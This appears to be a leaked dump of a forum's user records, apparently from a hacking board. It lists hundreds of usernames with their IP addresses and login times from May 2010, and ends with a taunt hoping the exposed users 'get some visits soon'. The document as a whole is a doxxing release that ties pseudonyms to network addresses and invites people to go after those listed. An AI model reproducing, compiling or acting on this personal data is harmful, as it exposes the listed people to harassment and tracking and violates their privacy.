+8025:Splendid:94.220.115.34:11.May,2010,16:27:03 +8039:Mochi:92.228.193.170:11.May,2010,22:24:09 +8040:Faceman79:85.182.104.114:11.May,2010,18:12:46 +8048:Mortalcookie:93.192.51.59:11.May,2010,17:56:44 +8061:shogun:82.113.106.223:11.May,2010,23:51:16 +8076:Doomypga:79.208.101.130:11.May,2010,22:21:30 +8091:ZeroX:212.42.227.5:12.May,2010,10:23:42 +8096:TORCIDA:84.58.174.120:11.May,2010,22:16:24 +8118:polat01:82.82.98.198:11.May,2010,22:16:54 +8121:blacKy:80.130.243.25:11.May,2010,22:33:21 +8123:Mrabcde:79.202.103.226:11.May,2010,21:47:03 +8129:C0unt1ng:91.0.59.95:11.May,2010,20:00:23 +8138:PAN:80.139.78.191:11.May,2010,16:49:00 +8155:ChrIsMas:217.227.69.229:11.May,2010,21:03:50 +8162:ciao007:92.231.36.209:11.May,2010,18:21:06 +8173:Legendzz:188.101.112.246:11.May,2010,17:59:34 +8200:iiiva:83.135.60.101:11.May,2010,18:00:15 +8214:RuSsAk:78.53.75.16:12.May,2010,00:15:35 +8224:restor:92.78.97.119:12.May,2010,08:26:54 +8227:uglydoll:82.170.40.135:11.May,2010,16:15:10 +8251:Speedfight2:93.192.43.50:11.May,2010,21:13:59 +8252:Kokz:91.96.189.244:11.May,2010,18:42:09 +8257:c4sh:80.121.103.189:12.May,2010,10:29:08 +8268:titan1970:79.222.125.124:12.May,2010,07:38:32 +8282:D-Kay:212.117.185.116:11.May,2010,16:17:48 +8294:Headz0r:92.106.19.169:11.May,2010,20:41:30 +8299:jerry:78.55.228.34:11.May,2010,22:08:21 +8303:toco:62.143.97.94:11.May,2010,20:37:07 +8308:Sp3iky:84.165.82.15:11.May,2010,21:02:36 +8317:Dukiereloaded:69.177.223.250:11.May,2010,22:19:02 +8332:Kiffer:79.204.158.117:12.May,2010,10:30:27 +8338:whacker:84.160.244.249:11.May,2010,21:51:38 +8353:Acer:82.113.106.219:11.May,2010,16:27:14 +8357:usher99:79.224.37.94:11.May,2010,19:55:45 +8374:KarstenXXL:93.218.163.130:11.May,2010,20:07:29 +8376:Goldenboy:109.192.172.136:11.May,2010,19:06:43 +8410:fame.de:93.217.190.64:11.May,2010,18:56:11 +8421:Ganymedes:80.136.190.145:12.May,2010,11:01:57 +8425:jumpstyle:89.247.199.82:11.May,2010,16:31:03 +8432:lala:87.118.118.37:11.May,2010,23:31:30 +8438:slashx:217.150.241.142:11.May,2010,18:11:39 +8440:ghostx:41.221.184.113:12.May,2010,00:22:16 +8446:Boiii:91.4.165.113:11.May,2010,18:30:25 +8498:underg22:109.90.32.17:12.May,2010,02:20:59 +8556:yolle:77.1.150.10:11.May,2010,17:49:14 +8566:jazzman:95.88.211.83:11.May,2010,19:19:42 +8567:systemboss:77.177.37.40:11.May,2010,19:31:57 +8568:Bi0virus:95.33.81.178:11.May,2010,21:35:07 +8570:Switchmaster:95.222.48.71:12.May,2010,00:51:56 +8577:desibug:95.143.192.159:11.May,2010,18:49:29 +8587:Suriv:217.23.6.162:11.May,2010,20:58:36 +8594:Zagerus:62.227.86.213:11.May,2010,18:57:02 +8599:Killerkeks:84.19.169.229:11.May,2010,20:02:43 +8604:Nop0x90:87.78.17.9:11.May,2010,22:03:56 +8608:meph!sto:204.232.242.247:11.May,2010,22:08:00 +8617:summer:78.49.86.99:11.May,2010,16:40:05 +8633:ragga.muffin:77.4.1.54:11.May,2010,20:39:09 +8646:x3r0x:77.176.221.240:11.May,2010,17:34:27 +8696:Tiberius:62.143.67.96:11.May,2010,21:47:32 +8699:crack91:84.151.243.157:11.May,2010,19:47:32 +8709:colya:92.241.164.47:11.May,2010,16:58:16 +8716:Legend300:88.64.139.139:11.May,2010,20:45:03 +8728:Kroni:84.60.58.38:11.May,2010,17:27:04 +8737:King99:85.178.210.87:12.May,2010,08:14:37 +8751:ACHEL0S:93.190.141.160:12.May,2010,04:54:04 +8758:h4Rd:92.74.59.212:11.May,2010,17:19:03 +8774:Freakasod:93.209.225.11:12.May,2010,11:45:58 +8782:dejavue:89.245.12.55:11.May,2010,19:44:29 +8794:NDTBIT:91.1.174.196:11.May,2010,16:53:32 +8801:SainT:77.184.90.195:11.May,2010,22:52:14 +8802:ppp:213.39.134.165:12.May,2010,10:38:07 +8822:Mars:79.248.107.69:11.May,2010,19:38:22 +8836:Skanderbeg:92.241.164.47:12.May,2010,00:52:00 +8849:Heroinas:78.60.30.20:11.May,2010,17:19:55 +8868:onur19:188.105.202.9:11.May,2010,23:42:11 +8927:BlackHook:91.67.7.111:11.May,2010,19:48:22 +8937:Shadowgamer:62.158.4.79:11.May,2010,21:20:27 +8943:FabeLz:92.78.129.215:11.May,2010,21:10:47 +8949:hammerhart:77.176.253.162:11.May,2010,21:15:19 +8958:weep:94.246.127.20:12.May,2010,11:36:28 +8968:Makaveli27:84.19.169.163:11.May,2010,16:32:34 +8982:Apekw_:109.91.56.185:11.May,2010,16:43:54 +8987:Triple:85.13.237.74:11.May,2010,20:55:02 +8988:Ex0r:82.113.121.217:11.May,2010,22:08:56 +8994:GoldRock:195.254.135.94:11.May,2010,17:14:16 +9037:K3Y:217.235.225.52:11.May,2010,16:59:03 +9039:soxtexo:93.135.19.171:11.May,2010,17:05:21 +9056:phoks:79.199.239.96:11.May,2010,16:28:16 +9067:b3g1n3R:87.122.182.41:11.May,2010,22:14:48 +9091:Ansem:62.141.53.224:12.May,2010,00:38:54 +9111:Misa:217.225.78.216:11.May,2010,21:55:53 +9129:7x375:217.150.241.142:11.May,2010,19:37:53 +9130:Half-Life:77.187.30.11:12.May,2010,11:39:24 +9131:weizen01:85.16.26.206:11.May,2010,18:28:44 +9141:Django:84.19.169.226:11.May,2010,19:32:28 +9155:wurstbrot:84.142.79.117:11.May,2010,22:36:54 +9159:Ag3nt:88.71.93.186:12.May,2010,01:09:46 +9177:eta-dimon:188.106.110.12:12.May,2010,10:16:48 +9184:Nexus:217.229.71.51:11.May,2010,22:20:50 +9202:Diam:213.164.102.94:11.May,2010,16:54:07 +9226:radiostart:91.57.211.41:11.May,2010,21:09:50 +9245:Z3ro.ru:95.208.92.95:11.May,2010,19:00:30 +9263:Koksi:217.224.249.100:11.May,2010,23:18:51 +9301:K1!!3R:91.11.214.230:11.May,2010,20:15:16 +9310:agonoize:91.4.72.134:11.May,2010,21:54:51 +9319:CyberGT:77.22.82.226:11.May,2010,17:09:36 +9329:SurfArab:88.67.200.223:11.May,2010,16:19:58 +9336:Lifehater:88.69.215.121:11.May,2010,22:41:00 +9339:FridayDie:212.117.165.197:11.May,2010,19:09:40 +9389:MaSarie:87.150.8.176:11.May,2010,16:22:55 +9391:Pat_16:91.113.5.16:11.May,2010,19:42:20 +9407:Neopolan:91.38.193.85:11.May,2010,17:39:01 +9416:N1ghtm4r3:91.36.96.102:11.May,2010,17:01:03 +9429:Ankashi:92.72.86.11:11.May,2010,19:39:37 +9432:Murderbass:89.15.229.48:11.May,2010,23:12:29 +9470:BlackMatrix:109.91.32.36:11.May,2010,16:52:07 +9473:mandy:217.236.101.125:11.May,2010,22:28:23 +9500:ssh-socks:84.19.169.172:11.May,2010,21:33:44 +9517:cl_b0b:80.143.234.27:12.May,2010,03:01:51 +9518:cunit156:84.58.146.214:11.May,2010,22:26:48 +9519:comodore:79.206.186.71:11.May,2010,18:42:36 +9536:JBG31:92.76.234.73:12.May,2010,01:11:00 +9540:Redlight:188.192.225.86:11.May,2010,21:32:02 +9547:Marru:88.64.143.248:11.May,2010,20:11:54 +9549:Europium:212.117.185.116:11.May,2010,20:27:09 +9567:Sweet_Butcher:87.179.254.26:11.May,2010,20:04:44 +9569:Ch40s:87.118.108.176:11.May,2010,18:25:27 +9579:Paysafecard:92.241.168.24:11.May,2010,17:24:11 +9585:KRON0S:80.226.14.32:12.May,2010,00:47:17 +9593:Cash:92.241.164.47:12.May,2010,11:45:55 +9599:dariusz:79.218.121.15:11.May,2010,22:47:27 +9602:RipperWatch:82.113.121.248:11.May,2010,22:05:14 +9604:Crasch:188.165.201.74:11.May,2010,18:03:11 +9632:zameit:212.117.185.116:11.May,2010,16:55:11 +9641:Black-Hack:78.50.130.86:12.May,2010,10:06:49 +9644:v.Realistic:92.241.164.47:11.May,2010,18:25:29 +9645:noob@pc:94.216.12.85:11.May,2010,16:43:52 +9653:mawter:84.167.117.126:11.May,2010,20:28:36 +9661:2PaCalyPsEnOw:84.61.57.160:11.May,2010,22:33:51 +9678:Scoore:109.250.41.153:11.May,2010,21:13:57 +9707:Cobega:92.229.123.19:11.May,2010,23:59:16 +9711:potatokiller:93.223.168.110:11.May,2010,20:49:02 +9712:Pla3er:84.62.68.226:11.May,2010,21:26:36 +9714:cutsman:217.87.160.145:11.May,2010,22:43:35 +9717:raiden955:78.94.80.104:12.May,2010,11:18:59 +9733:mosa01:84.19.169.162:11.May,2010,21:12:50 +9736:mc_lovin:77.9.38.104:11.May,2010,18:20:06 +9753:Tweaknap:89.182.223.52:12.May,2010,03:42:43 +9767:popaj:84.114.186.67:12.May,2010,00:12:29 +9770:versesone:91.65.225.27:11.May,2010,18:45:34 +9783:j9ker87:79.224.110.144:11.May,2010,23:23:18 +9792:SynStorm:78.48.79.125:11.May,2010,23:49:28 +9797:bentley:85.22.2.120:11.May,2010,22:23:17 +9802:test:189.72.176.61:12.May,2010,01:52:52 +9804:DjKisune:95.211.10.25:11.May,2010,19:49:50 +9813:Celebrate:79.225.41.107:12.May,2010,07:55:09 +9816:n00rd:84.23.75.42:11.May,2010,19:49:09 +9828:ArthurSpooner:96.9.186.69:12.May,2010,09:59:39 +9830:dd7:78.51.37.93:11.May,2010,18:14:20 +9832:davis_cc:92.231.154.124:11.May,2010,22:40:24 +9840:Casanova:94.222.106.139:12.May,2010,01:14:19 +9858:alpha210:82.83.136.30:12.May,2010,11:38:29 +9870:pixelg0tt:94.218.12.40:11.May,2010,22:01:57 +9873:Einsam01:95.223.48.26:11.May,2010,18:17:57 +9876:blubi:83.135.60.101:11.May,2010,19:02:56 +9897:Du3en:88.78.43.113:11.May,2010,17:48:07 +9900:Samsung:93.221.210.207:11.May,2010,22:19:03 +9907:Pasion1988:188.194.27.216:11.May,2010,22:20:59 +9910:kr0x:213.163.72.149:11.May,2010,17:13:47 +9912:hmmi:87.185.66.192:11.May,2010,18:34:58 +9915:BA!!:109.90.145.68:11.May,2010,23:20:53 +9922:xxbsxe:188.96.189.237:12.May,2010,01:30:46 +9923:ghosty:217.226.217.221:11.May,2010,20:15:29 +9924:3lite:79.199.146.119:12.May,2010,08:58:39 +9940:rEvAnCe:91.7.138.40:11.May,2010,19:44:36 +9942:Cyler:76.73.18.50:11.May,2010,22:34:27 +9944:Bonbergol:87.106.83.145:11.May,2010,18:48:32 +9950:coolio:92.241.164.47:12.May,2010,00:23:46 +9953:T.K|Day:79.197.67.236:11.May,2010,16:43:35 +9958:fstyle:88.76.165.128:12.May,2010,07:57:10 +9961:ag4inst:188.97.245.194:11.May,2010,20:50:05 +9976:shibukii:88.134.50.134:11.May,2010,22:04:13 +9979:skAi:92.241.164.47:11.May,2010,16:27:06 +9982:rerebelabt:88.74.4.226:11.May,2010,18:10:28 +10000:gigamesh:193.105.134.54:11.May,2010,16:22:34 +10006:Vetolt;3:95.208.15.191:11.May,2010,17:33:04 +10016:marijuana:78.94.241.121:11.May,2010,17:47:45 +10017:master09:77.189.71.217:11.May,2010,17:20:21 +10024:chillah:85.214.127.47:11.May,2010,21:45:22 +10025:K1ngmoe:217.93.165.164:11.May,2010,18:55:39 +10029:funst3r:84.19.169.163:11.May,2010,22:29:57 +10033:bigdaddy22:109.43.159.195:11.May,2010,17:25:09 +10037:digggah:77.21.50.241:12.May,2010,02:26:13 +10040:Ghostt:95.211.99.91:11.May,2010,19:55:29 +10062:scene_it:92.248.2.75:11.May,2010,23:20:54 +10067:mayer:84.19.169.172:11.May,2010,20:32:53 +10080:dulla:93.232.75.113:11.May,2010,18:42:10 +10083:razorrs:88.152.238.14:12.May,2010,04:28:00 +10117:terrorstyle:212.150.184.108:11.May,2010,17:45:35 +10125:Petrisun:77.187.9.162:11.May,2010,18:02:33 +10131:RollingStone:78.48.184.88:11.May,2010,19:18:48 +10137:Sveiven:79.228.174.19:12.May,2010,07:02:45 +10141:Bayburtluu69:88.73.154.51:11.May,2010,18:55:56 +10168:deathmind:81.210.249.9:11.May,2010,19:42:51 +10170:BullDDOSer:87.118.118.57:12.May,2010,04:08:13 +10176:volcom:217.93.96.73:11.May,2010,21:09:58 +10179:tsd:79.210.91.214:11.May,2010,20:17:09 +10183:Terroa:87.159.167.23:12.May,2010,00:01:09 +10187:wac4:84.174.104.30:11.May,2010,20:12:01 +10211:Resigned:80.138.165.248:11.May,2010,22:53:52 +10226:xfedo:95.33.65.93:12.May,2010,02:14:34 +10228:Quazz:41.237.5.97:11.May,2010,21:27:08 +10229:Morgen:80.201.63.54:11.May,2010,21:28:07 +10240:kingkong2010:92.224.86.210:12.May,2010,00:43:24 +10250:Julix:84.174.238.53:11.May,2010,21:43:50 +10253:manwe:85.126.75.242:11.May,2010,17:54:41 +10265:kevsuck:92.193.86.109:11.May,2010,22:39:27 +10268:MrNobody:217.227.136.246:11.May,2010,19:58:54 +10291:DonChaoz:217.94.247.5:12.May,2010,11:45:56 +10293:Only:78.94.201.31:11.May,2010,16:10:05 +10301:AlphaOmega:88.64.47.68:11.May,2010,16:29:29 +10304:x3n:93.213.47.124:11.May,2010,21:25:38 +10311:Daror:193.105.134.54:11.May,2010,20:14:47 +10322:sohei1337:217.24.10.114:11.May,2010,20:41:49 +10325:djemc:92.73.31.25:11.May,2010,16:13:40 +10339:secret:82.82.33.140:11.May,2010,22:57:50 +10355:FreeStyle:87.144.75.83:11.May,2010,16:43:03 +10390:DerUlli:91.41.5.157:12.May,2010,02:03:54 +10407:schmittke:88.66.158.144:11.May,2010,17:13:17 +10415:reiter07:92.230.68.131:12.May,2010,11:40:11 +10428:black-jack:212.117.185.116:12.May,2010,07:09:43 +10433:my_dear_hell:190.78.10.244:12.May,2010,02:11:31 +10435:ev0:96.9.186.69:11.May,2010,16:54:24 +10439:Khijano:62.143.0.206:11.May,2010,20:41:40 +10441:loyalerkamerad:212.117.160.22:12.May,2010,01:42:54 +10452:shrek-id:92.225.84.226:11.May,2010,22:06:58 +10455:Gh0stRydaH:77.189.22.38:11.May,2010,16:28:14 +10457:Safespeed:91.67.5.168:11.May,2010,18:17:46 +10478:SuperHorst:93.200.208.40:12.May,2010,11:07:52 +10480:pwnd:84.59.213.173:11.May,2010,17:45:16 +10493:V.Valentino:87.147.136.106:11.May,2010,17:58:33 +10505:anyway:125.27.21.52:11.May,2010,18:28:19 +10511:Tatinka:84.143.163.13:11.May,2010,18:04:12 +10513:Säbelzahntaube:78.48.228.163:11.May,2010,16:16:28 +10528:meradil18:90.136.102.191:11.May,2010,17:53:35 +10548:MuffinX:84.140.237.105:11.May,2010,18:29:53 +10556:uRmel23:77.21.182.4:12.May,2010,03:43:08 +10557:ingo5:109.91.242.97:12.May,2010,00:21:16 +10563:xxxxx:91.8.10.139:11.May,2010,22:27:27 +10595:ms89:79.226.242.143:11.May,2010,19:27:57 +10604:alibaby:93.203.133.100:11.May,2010,22:00:47 +10608:ATLAS:93.201.255.193:11.May,2010,21:47:04 +10613:groby:85.177.142.26:11.May,2010,18:25:34 +10620:xdondosk4ff:109.91.26.227:11.May,2010,16:59:21 +10644:audi:91.89.245.247:11.May,2010,17:35:07 +10658:Managarm:217.237.107.160:11.May,2010,17:52:17 +10683:Keks123:94.220.210.73:11.May,2010,17:16:08 +10686:Orthos_:80.132.83.180:11.May,2010,22:56:12 +10689:Freakzzor:84.188.252.230:11.May,2010,20:05:49 +10692:Klintel:78.42.209.30:12.May,2010,09:57:27 +10696:Cellix:85.31.187.72:11.May,2010,23:02:32 +10706:legit_2:93.192.189.186:11.May,2010,19:17:30 +10713:Dennixsx:78.42.210.158:11.May,2010,22:19:27 +10715:zaubermichel:91.22.69.36:11.May,2010,22:42:05 +10723:Hypnotoad:91.32.168.59:11.May,2010,16:52:16 +10727:Sperle:88.130.181.182:11.May,2010,16:21:41 +10735:RichiThebitchi:87.122.115.27:11.May,2010,19:56:10 +10741:KuroiRyu:92.231.129.139:11.May,2010,19:43:18 +10747:Darksro8:93.204.189.68:12.May,2010,07:47:38 +10749:jebiga30:85.179.64.135:12.May,2010,02:49:08 +10790:newcomer:94.75.220.32:11.May,2010,21:17:57 +10801:Muti:212.117.185.116:11.May,2010,20:34:24 +10807:txto:88.66.193.18:11.May,2010,22:57:47 +10809:jens3910:95.88.245.203:12.May,2010,11:08:16 +10816:badenator:188.109.14.1:11.May,2010,17:15:56 +10822:JohnWayne:85.249.223.55:11.May,2010,20:32:08 +10839:Kise:92.241.164.47:11.May,2010,16:53:50 +10850:black--cell:84.119.62.128:11.May,2010,16:23:43 +10851:dumper:93.217.93.211:11.May,2010,18:50:32 +10853:unbelievable:89.182.130.65:11.May,2010,21:42:45 +10870:shygo:84.61.11.144:11.May,2010,20:54:25 +10883:CARGLASS:193.105.134.54:11.May,2010,17:28:00 +10886:Au7oX3k:94.219.157.178:11.May,2010,23:08:09 +10912:tram111:81.173.148.233:11.May,2010,22:16:51 +10913:noirblanc:80.226.199.50:12.May,2010,00:07:12 +10920:fener:85.249.223.12:11.May,2010,20:54:56 +10921:godfella:78.55.168.97:11.May,2010,22:25:56 +10948:Kalle65:88.73.57.187:11.May,2010,23:34:42 +10952:patter:85.214.135.254:12.May,2010,08:48:01 +10961:Rafael1989:91.60.27.245:11.May,2010,16:41:06 +10980:xRaidon:188.40.70.74:11.May,2010,17:02:14 +10986:styler_jürgen:79.193.78.35:11.May,2010,20:51:45 +10990:fl1:78.54.29.112:11.May,2010,16:13:47 +11007:1337_reactioN:188.100.129.232:11.May,2010,20:14:53 +11008:TBL:80.171.167.199:11.May,2010,22:01:58 +11029:jolly-roger:76.76.104.107:11.May,2010,18:31:59 +11033:tri3cer:217.227.130.142:11.May,2010,21:28:24 +11038:Jonso:79.211.66.206:11.May,2010,20:51:06 +11041:JackDaniels:92.241.168.24:11.May,2010,20:41:50 +11045:wuschi:82.83.49.234:12.May,2010,03:47:47 +11056:Nyuu:87.122.24.188:12.May,2010,11:10:39 +11068:blocker:95.89.111.180:12.May,2010,11:36:15 +11071:CyOn!X:87.183.113.238:11.May,2010,19:20:13 +11074:Purehate:212.117.185.116:11.May,2010,21:02:40 +11085:zeratox:195.254.135.94:11.May,2010,22:00:58 +11092:panza:95.116.77.145:12.May,2010,01:26:56 +11095:k00ky:80.121.49.175:11.May,2010,20:30:43 +11099:Necrox:85.22.12.71:11.May,2010,21:12:47 +11107:x33q:85.179.89.156:11.May,2010,20:22:10 +11117:deviboy:217.226.171.230:11.May,2010,19:05:19 +11119:NoMercy:212.117.185.116:11.May,2010,21:50:15 +11143:Moe.:84.61.158.0:11.May,2010,19:29:29 +11148:iPoker:88.73.123.60:11.May,2010,19:41:02 +11151:magicman:93.223.144.10:11.May,2010,17:21:41 +11158:Dr.Zero:109.90.36.250:11.May,2010,21:28:16 +11175:VITALI-:92.194.168.3:11.May,2010,23:46:37 +11184:turk58:84.150.178.144:11.May,2010,22:13:45 +11186:brutusania86:87.123.139.215:11.May,2010,22:15:03 +11194:omiture:212.117.162.222:12.May,2010,10:56:30 +11197:crashX:91.33.57.47:11.May,2010,23:54:23 +11202:LongSleeper:109.91.68.148:11.May,2010,20:32:36 +11204:fogel:87.151.207.47:11.May,2010,17:37:47 +11214:faridbang:109.192.82.66:11.May,2010,20:19:19 +11231:Torres:92.225.148.203:11.May,2010,22:36:01 +11245:babyb0y:188.106.118.226:11.May,2010,19:54:05 +11251:Spezialist:78.55.22.216:12.May,2010,01:39:23 +11252:awesome:79.196.212.248:11.May,2010,19:17:23 +11256:Corleone:92.105.169.123:11.May,2010,19:20:11 +11261:sdone:87.78.38.157:12.May,2010,07:52:12 +11269:Eileen:95.211.13.145:11.May,2010,21:46:38 +11279:clown_1900:85.178.36.1:12.May,2010,00:30:31 +11287:D3!.Dos:84.150.250.248:11.May,2010,19:50:33 +11290:mehmet111:87.78.75.13:12.May,2010,00:59:42 +11294:D3NN1S:91.6.209.86:11.May,2010,22:13:20 +11300:Chio:82.113.119.246:11.May,2010,16:30:23 +11311:whazun:77.178.223.73:11.May,2010,22:18:48 +11313:RnB:93.130.80.33:11.May,2010,23:45:28 +11318:Dunkelziffer:188.194.98.38:11.May,2010,16:36:08 +11327:SoNiice:217.85.150.105:11.May,2010,17:41:46 +11334:Roffamaffia:77.162.16.18:11.May,2010,17:35:10 +11336:Mischa93:79.202.169.37:11.May,2010,20:36:46 +11344:cubemaster:95.33.134.58:11.May,2010,16:18:25 +11348:Tzolli:93.232.83.201:11.May,2010,20:39:50 +11370:veru:217.87.158.159:11.May,2010,16:56:41 +11376:TERROR-LIVE:213.240.190.122:12.May,2010,01:51:29 +11379:al--big--al:188.46.225.162:11.May,2010,22:43:43 +11382:Piranha:87.78.240.150:11.May,2010,20:49:01 +11403:HastaLaVista:109.90.16.241:11.May,2010,20:51:54 +11408:mesrine:188.194.203.255:11.May,2010,20:00:51 +11443:spOrtkOch:92.72.114.178:11.May,2010,20:06:50 +11448:BGDE_Team:93.190.141.160:11.May,2010,16:33:08 +11465:rayb:77.189.101.247:12.May,2010,11:01:55 +11469:DER-BETRUER:87.118.120.182:12.May,2010,09:09:00 +11496:Darkmarket:84.181.116.137:11.May,2010,16:23:06 +11509:redrebel:92.76.13.74:11.May,2010,18:22:20 +11519:Tjak:94.220.242.201:11.May,2010,22:38:56 +11523:darkking123:62.227.119.56:11.May,2010,18:06:53 +11527:Krynes:94.221.234.126:11.May,2010,22:32:37 +11528:sarex:92.76.120.119:11.May,2010,16:34:49 +11531:newb:87.184.33.15:12.May,2010,00:16:08 +11542:Zeus10:94.79.138.1:11.May,2010,21:21:30 +11574:Casy:81.210.76.243:12.May,2010,06:17:13 +11597:Supremacy:92.204.53.65:11.May,2010,17:31:16 +11637:machalek:88.72.14.38:11.May,2010,22:08:01 +11639:dontknow:93.232.104.36:11.May,2010,20:39:25 +11641:Octane:93.232.42.148:11.May,2010,19:23:23 +11655:BBHero:91.7.77.206:11.May,2010,18:28:13 +11664:Ven0m:84.188.172.96:11.May,2010,20:24:52 +11671:kerberos:84.19.190.28:12.May,2010,08:22:15 +11682:zwiehack:188.195.175.77:12.May,2010,00:14:31 +11705:idf2107.3:217.83.188.33:11.May,2010,16:42:31 +11720:Markusinho:92.241.164.47:11.May,2010,18:05:02 +11725:WUCONFIRM:83.185.34.36:12.May,2010,04:28:52 +11726:ShorK:85.178.58.44:11.May,2010,17:32:31 +11747:Foer:89.244.187.181:11.May,2010,20:02:57 +11786:sicpain:193.158.186.139:11.May,2010,22:03:04 +11804:angeluz:190.78.11.224:12.May,2010,00:20:21 +11830:Thuks:93.232.76.130:11.May,2010,21:11:10 +11832:sinner:95.90.165.52:11.May,2010,18:50:46 +11836:Karl:92.224.2.160:11.May,2010,21:02:52 +11872:Tronix:87.180.200.210:11.May,2010,18:56:40 +11899:Sule_89:80.254.73.61:11.May,2010,20:59:56 +11903:inject:84.56.242.105:11.May,2010,22:15:53 +11905:income:87.181.238.146:11.May,2010,20:31:31 +11909:Greras:78.42.178.196:11.May,2010,17:51:44 +11910:HannsG:91.50.230.198:11.May,2010,22:18:58 +11918:c0caine:84.188.172.96:11.May,2010,18:03:42 +11922:alternate:77.12.202.16:11.May,2010,18:42:43 +11934:makereal:87.118.118.37:11.May,2010,20:34:09 +11949:MIN0S:217.150.241.142:11.May,2010,21:29:24 +11953:zexx:84.19.169.165:11.May,2010,22:30:08 +11975:Futurama:92.75.157.11:11.May,2010,17:53:14 +11976:zukow:79.201.113.143:11.May,2010,20:03:19 +11988:feiertmich:84.61.17.253:11.May,2010,16:51:56 +11992:Five7even:80.144.136.99:11.May,2010,18:04:42 +12016:raidrush:79.215.83.12:12.May,2010,07:30:53 +12017:JacktheRippaHH:82.83.136.30:11.May,2010,18:43:38 +12049:hansi3000:92.241.168.90:11.May,2010,21:42:23 +12060:haxxorre:188.109.223.80:11.May,2010,17:34:55 +12068:YaYa:93.182.144.8:11.May,2010,22:20:53 +12081:Panzerschokola:94.220.180.167:12.May,2010,08:45:22 +12098:xNZ:94.219.253.110:11.May,2010,19:04:56 +12103:scorpion94:95.211.2.32:11.May,2010,22:27:49 +12105:r4iden:212.117.185.116:11.May,2010,20:50:55 +12111:bedrock:195.254.134.10:12.May,2010,10:41:55 +12120:miXer:85.249.223.56:11.May,2010,19:40:27 +12125:_daddy_:87.144.70.118:11.May,2010,20:13:57 +12133:Kashim:77.177.107.218:12.May,2010,09:41:48 +12138:redITALY:178.82.234.47:11.May,2010,18:52:20 +12140:Chains:77.21.231.82:11.May,2010,16:17:58 +12154:ASUS_freak:84.171.35.119:11.May,2010,16:38:32 +12161:nico277:91.61.21.87:12.May,2010,00:05:40 +12174:hackbart2:82.113.121.248:11.May,2010,22:07:25 +12182:PublicHero:95.89.124.43:11.May,2010,17:01:42 +12192:Freestyler_Tak:92.202.29.125:11.May,2010,16:15:55 +12206:Cryy:217.255.195.199:11.May,2010,21:20:00 +12213:Pedda:92.241.168.24:11.May,2010,16:54:35 +12216:BossHoss:87.178.166.210:11.May,2010,20:42:25 +12230:Fruchtii:91.38.0.254:11.May,2010,21:18:44 +12232:IchBossDuNix:213.163.64.43:11.May,2010,18:30:19 +12238:derchillertyp:92.76.18.14:11.May,2010,18:02:19 +12263:Eylex123:92.204.43.71:11.May,2010,23:15:24 +12270:Crackzy:84.63.134.191:11.May,2010,22:55:10 +12276:bubumaster:88.234.102.138:12.May,2010,08:36:48 +12280:relat0r:79.228.42.82:11.May,2010,19:22:05 +12283:ZeroOwner:91.47.217.250:11.May,2010,18:06:22 +12284:MontanaMax:95.89.151.194:11.May,2010,18:13:42 +12301:g0sha:91.22.141.202:11.May,2010,18:21:39 +12304:Money4Payment:88.76.53.196:12.May,2010,01:15:45 +12328:Violence:89.244.244.27:11.May,2010,16:47:58 +12336:brainwash1337:87.165.117.234:11.May,2010,20:17:31 +12340:1llegal:188.107.131.152:11.May,2010,21:08:53 +12356:fuck_systems:80.120.235.90:12.May,2010,10:38:53 +12367:FU-Yok:87.118.120.182:12.May,2010,08:07:16 +12379:Jozgi:93.194.126.206:12.May,2010,09:17:54 +12382:Fuyox3:88.78.166.133:11.May,2010,19:54:26 +12391:Solid1234:84.46.38.110:11.May,2010,17:58:23 +12395:M.O.B:75.126.206.223:11.May,2010,18:41:54 +12400:Herz0g:89.244.92.228:11.May,2010,23:11:15 +12415:ingredible:94.75.220.32:11.May,2010,20:23:54 +12421:Oldsql:208.75.191.69:11.May,2010,23:12:54 +12431:Xellent:93.223.146.217:11.May,2010,16:37:53 +12433:Daywalker:88.78.216.3:12.May,2010,10:01:41 +12448:choco-pie:95.88.57.102:11.May,2010,21:37:45 +12458:d4nniiistar:217.255.48.110:11.May,2010,21:51:52 +12495:cRanc:93.129.179.240:11.May,2010,23:23:11 +12500:LiLaLaunebaer:79.241.25.48:12.May,2010,11:08:18 +12503:Maskulin:84.171.7.3:12.May,2010,11:26:20 +12505:shdiam0nd:90.134.25.172:11.May,2010,16:41:41 +12509:Crax0r:195.254.135.84:11.May,2010,17:12:26 +12514:S1CK0NE:95.113.29.87:11.May,2010,19:06:08 +12519:bifrostilo:202.67.236.74:12.May,2010,00:00:09 +12558:YouTube:89.138.124.139:12.May,2010,05:52:50 +12560:NedoB:82.82.221.45:11.May,2010,17:51:19 +12561:4got10:84.143.211.36:11.May,2010,17:46:57 +12585:Mr.Dee:217.50.29.86:12.May,2010,09:13:46 +12592:Zukunft:93.232.172.204:11.May,2010,16:43:56 +12601:Sguschonka:94.134.182.154:11.May,2010,19:36:29 +12604:sptr:79.211.114.153:11.May,2010,21:42:57 +12611:D3NN1Sx:83.135.42.183:11.May,2010,22:17:14 +12616:~Tony~:88.70.2.90:11.May,2010,16:36:13 +12621:PommesGabel:79.203.119.33:11.May,2010,16:52:52 +12631:smoke_weed:85.181.168.106:12.May,2010,00:17:27 +12633:G0D:93.232.207.109:11.May,2010,23:35:18 +12635:fantas:87.188.66.81:11.May,2010,17:17:16 +12636:M0RPHEUS:217.23.6.162:11.May,2010,23:35:32 +12641:Chinchilla:84.60.247.199:11.May,2010,17:19:44 +12645:Psychoviper:217.233.232.185:11.May,2010,21:19:06 +12648:perfect:89.244.169.190:11.May,2010,17:26:02 +12653:theodeus:89.245.118.246:11.May,2010,16:54:23 +12655:Maniac:80.226.247.113:12.May,2010,01:20:28 +12657:Styx:87.189.167.165:11.May,2010,18:45:28 +12659:lolcat:188.194.40.92:12.May,2010,08:45:12 +12660:BurnA:80.226.44.89:11.May,2010,16:22:22 +12664:Sh0ck:92.72.58.1:11.May,2010,17:57:03 +12666:Eviloution:79.193.162.131:11.May,2010,22:13:35 +12667:Bonnie:89.217.119.107:11.May,2010,18:42:18 +12668:Ju-On:217.236.196.136:11.May,2010,19:23:00 +12670:Sylcore:87.184.246.30:11.May,2010,18:58:05 +12673:Go0g3L:84.161.80.239:11.May,2010,19:05:16 +12676:Hackl:84.112.174.99:12.May,2010,11:25:06 +12677:DocD00:88.64.88.32:11.May,2010,16:15:00 +12678:DocHater:84.173.114.200:11.May,2010,22:27:48 +12679:DonCamillo:87.79.162.216:11.May,2010,18:24:43 +12680:Dynamic:87.79.162.216:11.May,2010,18:27:18 +12683:Konflux:80.136.204.235:11.May,2010,18:26:38 +12684:hackx:87.122.176.4:11.May,2010,17:41:18 +12685:stroyer:91.58.83.223:11.May,2010,21:32:39 + +So all in all these nice addresses should teach you a lesson. Hope +you all get some visits soon. + + / 